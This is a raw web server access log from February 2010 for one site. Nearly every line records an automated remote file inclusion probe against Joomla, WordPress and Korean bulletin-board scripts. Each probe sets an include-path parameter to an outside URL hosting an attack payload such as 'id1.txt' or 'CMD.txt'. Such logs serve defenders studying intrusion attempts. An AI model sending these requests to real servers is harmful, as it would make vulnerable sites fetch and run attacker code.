211.239.121.204 - - [05/Feb/2010:23:19:01 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.239.121.204 - - [05/Feb/2010:23:19:01 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.239.121.204 - - [05/Feb/2010:23:19:04 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [05/Feb/2010:23:19:24 -0800] "GET /logs/access_100130.log%20%20////write_comment_update.php?bo_table=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [05/Feb/2010:23:19:26 -0800] "GET /logs/access_100130.log%20%20////write_comment_update.php?bo_table=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.239.121.204 - - [05/Feb/2010:23:19:34 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.239.121.204 - - [05/Feb/2010:23:19:34 -0800] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.239.121.204 - - [05/Feb/2010:23:19:34 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.239.121.204 - - [05/Feb/2010:23:19:47 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.239.121.204 - - [05/Feb/2010:23:19:47 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.239.121.204 - - [05/Feb/2010:23:19:47 -0800] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.43.212.56 - - [05/Feb/2010:23:20:10 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.43.212.56 - - [05/Feb/2010:23:20:10 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.43.212.56 - - [05/Feb/2010:23:20:11 -0800] "GET /logs/access_091024.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.43.212.56 - - [05/Feb/2010:23:20:34 -0800] "GET /logs/access_091121.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.113.251 - - [05/Feb/2010:23:22:17 -0800] "GET /logs/?N=D HTTP/1.0" 200 1208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
58.150.99.131 - - [05/Feb/2010:23:23:30 -0800] "GET /logs/access_100130.log%20%20////write_comment_update.php?bo_table=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [05/Feb/2010:23:24:51 -0800] "GET /logs/access_100130.log%20%20////write_comment_update.php?bo_table=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [05/Feb/2010:23:33:32 -0800] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [05/Feb/2010:23:33:32 -0800] "GET /logs/access_100116.log/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [05/Feb/2010:23:33:33 -0800] "GET /logs/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [05/Feb/2010:23:34:59 -0800] "GET /logs/access_100116.log/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [05/Feb/2010:23:34:59 -0800] "GET /logs/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
115.68.4.44 - - [05/Feb/2010:23:34:59 -0800] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:36:32 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:36:32 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:36:35 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:37:29 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:37:29 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:37:32 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:38:51 -0800] "GET /logs/access_091121.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:39:34 -0800] "GET /logs/access_091121.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:40:41 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:40:41 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:40:41 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:43:02 -0800] "GET /logs/access_091121.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:44:36 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:44:36 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:44:36 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:45:36 -0800] "GET /logs/access_091121.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:47:58 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.125.120.5 - - [05/Feb/2010:23:48:14 -0800] "GET /logs/access.log////////?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
116.125.120.5 - - [05/Feb/2010:23:48:14 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 1235 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
116.125.120.5 - - [05/Feb/2010:23:48:14 -0800] "GET ///////?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 920 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
116.125.120.5 - - [05/Feb/2010:23:48:17 -0800] "GET ///////?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 920 "-" "libwww-perl/5.79" "getyourselfahorse.com"
116.125.120.5 - - [05/Feb/2010:23:48:17 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 1235 "-" "libwww-perl/5.79" "getyourselfahorse.com"
116.125.120.5 - - [05/Feb/2010:23:48:18 -0800] "GET /logs/access_100116.log////////?mosConfig_absolute_path=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:48:22 -0800] "GET /logs/access_091121.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:48:55 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.73.17.7 - - [05/Feb/2010:23:49:17 -0800] "GET /logs/access_091121.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:54:24 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [05/Feb/2010:23:54:44 -0800] "GET /logs/access_091121.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
186.28.232.13 - - [06/Feb/2010:00:01:47 -0800] "GET /logs/access_100123.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
186.28.232.13 - - [06/Feb/2010:00:01:47 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
186.28.232.13 - - [06/Feb/2010:00:01:47 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
186.28.232.13 - - [06/Feb/2010:00:03:36 -0800] "GET /logs/access_100130.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
66.11.230.249 - - [06/Feb/2010:00:06:10 -0800] "GET /logs/access_100116.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:06:12 -0800] "GET /logs//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:06:13 -0800] "GET /logs/access_100116.log//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:06:13 -0800] "GET /logs/access.log//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:06:13 -0800] "GET /admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:07:02 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:07:02 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:07:02 -0800] "GET /logs/access_100116.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.11.230.249 - - [06/Feb/2010:00:08:15 -0800] "GET /logs/access_100130.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
116.125.120.5 - - [06/Feb/2010:00:10:08 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
116.125.120.5 - - [06/Feb/2010:00:10:08 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
116.125.120.5 - - [06/Feb/2010:00:10:08 -0800] "GET /logs/access_100116.log//modules/TotalCalendar/about.php?inc_dir=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
116.125.120.5 - - [06/Feb/2010:00:10:44 -0800] "GET /logs/access_100123.log//modules/TotalCalendar/about.php?inc_dir=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
95.211.7.129 - - [06/Feb/2010:00:13:34 -0800] "GET /logs/access_100116.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:00:14:09 -0800] "GET /logs/access.log/bbs/delete_all.php?http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:00:14:10 -0800] "GET /bbs/delete_all.php?http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:00:14:10 -0800] "GET /logs/bbs/delete_all.php?http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:15:28 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:15:28 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:15:28 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:15:51 -0800] "GET /admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:16:03 -0800] "GET /admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:16:03 -0800] "GET /logs//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:16:04 -0800] "GET /logs/access.log//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
95.211.7.129 - - [06/Feb/2010:00:16:35 -0800] "GET /logs/access_100130.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.108.61.176 - - [06/Feb/2010:00:16:39 -0800] "GET /logs/access_100130.log/bbs/delete_all.php?http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:18:33 -0800] "GET /logs/access.log//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:18:33 -0800] "GET /logs//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:19:18 -0800] "GET /logs/access_100116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:19:27 -0800] "GET /logs/access.log%20%20//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:20:13 -0800] "GET /logs/access_100116.log%20%20//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:20:13 -0800] "GET /logs//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
121.88.4.141 - - [06/Feb/2010:00:20:13 -0800] "GET /admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:20:32 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:20:32 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:20:32 -0800] "GET /delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:23:15 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:23:15 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:00:23:16 -0800] "GET /logs/access_100130.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:23:31 -0800] "GET /delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:23:31 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:23:31 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:23:46 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:23:46 -0800] "GET /delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:23:46 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:24:00 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
213.171.37.206 - - [06/Feb/2010:00:24:25 -0800] "GET /logs/access_100123.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
213.171.37.206 - - [06/Feb/2010:00:24:25 -0800] "GET /errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
213.171.37.206 - - [06/Feb/2010:00:24:25 -0800] "GET /logs//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:25:16 -0800] "GET /logs/access_100116.log//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.113.251 - - [06/Feb/2010:00:25:58 -0800] "GET /discuss/?D=A HTTP/1.0" 200 512 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:27:01 -0800] "GET /delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:27:01 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:00:27:01 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
